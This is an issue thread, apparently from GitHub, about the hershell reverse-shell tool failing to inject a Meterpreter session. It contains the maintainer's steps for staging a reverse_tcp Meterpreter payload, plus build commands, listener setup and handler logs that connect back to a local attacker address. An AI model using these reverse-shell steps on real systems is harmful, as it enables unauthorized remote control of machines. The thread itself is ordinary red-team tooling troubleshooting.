run meterpreter failed (hershell issue, closed)

sysdream commented on September 2, 2024
run meterpreter failed

Comments (7)

lesnuages commented on September 2, 2024

Hi @b1tg,
Thanks for the report, I'll look into it this week.

Please note that this feature is a bit buggy currently, and I am working on a way to improve it.

lesnuages commented on September 2, 2024

Ok so I see what's going on here, and you might have misunderstood something along the way.

You need two payload handlers:

  • one for hershell to connect back
  • one for your meterpreter payload to connect back

The one I gave as an example in the README is the one needed for hershell.

You need to start another one for your meterpreter session. Currently, I'm only supporting the following payloads for the meterpreter staging:

  • windows/meterpreter/reverse_tcp: the X86 reverse TCP meterpreter for Windows
  • windows/x64/meterpreter/reverse_tcp: the X86_64 TCP meterpreter for Windows

I've implemented reverse_http and reverse_https, but they need more testing before being pushed to master.

So, to sum it up, what you need is:

  1. Start a listener for hershell (ncat, openssl, msfconsole, etc.)
  2. Get your hershell session
  3. Start a payload handler (using exploit/multi/handler) for the following payload: windows/x64/meterpreter/reverse_tcp
  4. Run meterpreter KALI_IP:PORT in hershell
  5. Hopefully, enjoy your new injected meterpreter

The current README might be confusing, so I think I will add some examples and clean it up a bit so there will be no more confusion in the future.

Let me know if it still does not work after trying this.

And anyway, thanks for your interest in this project.

b1tg commented on September 2, 2024

I tried this again and it still doesn't work: hershell exited after running "meterpreter ip:port", and the meterpreter session wasn't created.

msf exploit(handler) > jobs

Jobs
====

  Id  Name                    Payload                              Payload opts
  --  ----                    -------                              ------------
  2   Exploit: multi/handler  windows/x64/meterpreter/reverse_tcp  tcp://192.168.123.47:1235

msf exploit(handler) >
[*] Sending stage (205379 bytes) to 192.168.123.47
[*]  - Meterpreter session 4 closed.  Reason: Died
[*] Meterpreter session 4 opened (127.0.0.1 -> 127.0.0.1) at 2018-01-22 13:33:04 +0800

msf exploit(handler) > sessions

Active sessions
===============

No active sessions.

msf exploit(handler) >

ss@kali:~/Desktop/tools/hershell$ make windows64 LHOST=192.168.123.47 LPORT=1234
GOOS=windows GOARCH=amd64 go build --ldflags "-X main.connectString=192.168.123.47:1234 -X main.fingerPrint=$(openssl x509 -fingerprint -sha256 -noout
-in server.pem | cut -d '=' -f2) -H=windowsgui" -o hershell.exe hershell.go

ss@kali:~/Desktop/tools/hershell$ ls
hershell.exe  hershell.go  Makefile  README.md  server.key  server.pem  shell

ss@kali:~/Desktop/tools/hershell$ openssl s_server -cert server.pem -key server.key -accept 1234
Using default temp DH parameters
ACCEPT
-----BEGIN SSL SESSION PARAMETERS-----
MHUCAQECAgMDBALALwQgsxNQxfJJJdMvrhFAhJTvJLwpKgmKPoJCgX+fdym91b4E
MKdz81UgLJ0ThllSWD3rG/hJfPsXCB1etszAKPpzjPnXUFYhJTc97PiFOGk5vJjj
KaEGAgRaZXc7ogQCAhwgpAYEBAEAAAA=
-----END SSL SESSION PARAMETERS-----
Shared ciphers:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-CHACHA20-POLY1305:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-AES128-SHA:ECDHE-ECDSA-AES128-SHA:ECDHE-RSA-AES256-SHA:ECDHE-ECDSA-AES256-SHA:AES128-GCM-SHA256:AES256-GCM-SHA384:AES128-SHA:AES256-SHA
Signature Algorithms: RSA+SHA256:ECDSA+SHA256:RSA+SHA384:ECDSA+SHA384:RSA+SHA1:ECDSA+SHA1
Shared Signature Algorithms: RSA+SHA256:ECDSA+SHA256:RSA+SHA384:ECDSA+SHA384:RSA+SHA1:ECDSA+SHA1
Supported Elliptic Curve Point Formats: uncompressed
Supported Elliptic Curves: X25519:P-256:P-384:P-521
Shared Elliptic curves: X25519:P-256:P-384:P-521
CIPHER is ECDHE-RSA-AES128-GCM-SHA256
Secure Renegotiation IS supported
[hershell]> meterpreter 192.168.123.47:1235
[hershell]> ERROR
shutting down SSL
CONNECTION CLOSED
ACCEPT

lesnuages commented on September 2, 2024

Thanks for the update, I'll look into it.

As I said earlier, this feature is still a bit buggy, and needs improvements.

I'll leave this issue open until the meterpreter injection works reliably.

I had some similar issues with Windows Server 2008 R2 recently: I had to retry several times to get the reverse TCP payload to work, whereas it worked like a charm on a Windows 10 machine.

Anyway, I'll look into it.

lesnuages commented on September 2, 2024

The issue should be fixed in 3ceef30, pushed in master.

There was indeed a problem while fetching the stage2 from the metasploit TCP handler.

Could you please get the latest version and test again?

I have no problem on Windows 10 x64 with this update.

b1tg commented on September 2, 2024

I just tested again; the problem is fixed in the latest version.
Nicely done! @lesnuages

lesnuages commented on September 2, 2024

Great, let's close this one :)
